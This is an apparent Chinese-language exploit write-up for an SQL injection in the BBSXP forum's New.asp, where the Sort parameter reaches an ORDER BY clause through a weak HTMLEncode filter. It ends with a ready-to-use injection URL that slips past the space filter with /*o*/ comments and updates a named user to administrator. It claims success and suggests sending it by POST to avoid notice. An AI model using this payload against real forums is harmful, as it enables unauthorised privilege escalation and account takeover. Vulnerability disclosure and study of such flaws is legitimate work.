BBSXP论坛程序New.asp页面过滤不严导致SQL注入漏洞

受影响系统：

BBSXP7.3

BBSXP2008

漏洞文件：

New.asp

代码分析：

Sort=HTMLEncode(Request("Sort")) //第24行

if Sort = empty then

SqlSort="ThreadID"

else

SqlSort=Sort

end if

。。。。。。

sql="Select top "&SqlTopicCount&" * from ["&TablePrefix&"Threads] where Visible=1 "&SqlForumID&" "&SqlTimeLimit&" order by "&SqlSort&" desc" //第66行

过滤函数HTMLEncode 在文件BBSXP_Class.asp中：

Function HTMLEncode(fString)

fString=Replace(fString,CHR(9),"")

fString=Replace(fString,CHR(13),"")

fString=Replace(fString,CHR(22),"")

fString=Replace(fString,CHR(38),"&") \’“&”

fString=Replace(fString,CHR(32)," ") \’“ ”

fString=Replace(fString,CHR(34),""") \’“"”

fString=Replace(fString,CHR(39),"'") \’“\’”

fString=Replace(fString,CHR(42)&CHR(42),"**") \’“**”/**/

fString=Replace(fString,CHR(44),",") \’“,”

fString=Replace(fString,CHR(45)&CHR(45),"--") \’“–”

fString=Replace(fString,CHR(60),"<") \’“<”

fString=Replace(fString,CHR(62),">") \’“>”

fString=Replace(fString,CHR(92),"\") \’“\\”

fString=Replace(fString,CHR(59),";") \’“;”

fString=Replace(fString,CHR(10),"<br>")

fString=ReplaceText(fString,"([&#])([a-z0-9]*);","$1$2;")

if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))

if IsSqlDataBase=0 then \’过滤片假名(日文字符)[\\u30A0-\\u30FF] by yuzi

fString=escape(fString)

fString=ReplaceText(fString,"%u30([A-F][0-F])","&#x30$1;")

fString=unescape(fString)

end if

HTMLEncode=fString

End Function

HTMLEncode过滤了Tab键，空格，** .

变量SqlSort过滤不严导致sql注入漏洞的产生。

漏洞测试：

http://localhost/bbsxp/new.asp?Sort=ThreadID/*o*/update/*o*/bbsxp_users/*o*/set/*o*/UserRoleID=1/*o*/where/*o*/Username=0x6C006F00760065006D006D006D00/*o*/select/*o*/*/*o*/from/*o*/BBSXP_users/*o*/order/*o*/by/*o*/userid

成功修改用户名为lovemmm为管理员。(最好使用POST提交呵呵)